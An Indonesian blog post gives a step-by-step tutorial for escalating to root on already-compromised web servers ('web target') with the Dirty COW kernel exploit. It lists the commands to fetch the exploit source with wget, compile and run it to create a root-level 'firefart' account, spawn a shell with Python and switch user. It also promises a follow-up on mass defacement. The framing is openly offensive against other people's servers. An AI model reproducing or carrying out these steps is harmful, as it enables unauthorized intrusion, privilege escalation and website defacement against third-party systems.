MAGELANG1337.COM

Search

Cara Simple Rooting Server



Beberapa hari kemarin gw Post Cara Backconnect dengan bindshell


Jadi post gw ini lanjutan yang kemaren. Lumayan agak susah cari target yang kernel 2016 kebawah. Akhirnya Gw disini rooting pake Dirty COW


Catatan : Tutorial ini Work dikernel 2016 kebawah


oke langsung aja Setelah Backconnect berhasil. Kalian buat Direktori baru gw buat nya lewat CMD


Ketikkan : 


mkdir sec

cd sec



Setelah berhasil membuat directory, saat nya Upload localroot dirty nya, kebetulan web target gw wget nya ON. jadi gw pake command wget [link]
kalo ngga kalian bisa upload localroot nya manual.

Ketikkan : 


wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c




Setelah itu kita compile dirty.c pake command


Ketikkan :


gcc -pthread dirty.c -o dirty -lcrypt

chmod +x dirty
./dirty

Kalo berhasil ada tulisan please enter the new password : kalian masukkan password apa aja. dan tulisan seperti ini



Nah kebetulan tadi waktu gw masukin password & mau login ke akun Firefart web target gw Disconnect + error, jadi belom sempet gw screenshot. Setelah itu kalian cek berhasil atau tidak dengan command

Ketikkan : id firefart



lalu kalian login ke akun firefart nya sebelum nya ketikkan command berikut

Ketikkan : 

Python -c  'import pty; pty.spawn("/bin/sh")
su firefart 
Password : [Password yg tadi kalian masukkan]

Buat tau sukses login Root Cek Lagi pake command
Ketikkan :

whoami

Oke sekian Tutorial kali ini.. Mungkin Besok Kalo Sempet Gw bakal share tutorial Mass Deface setelah Rooting server.
Comments
0 Comments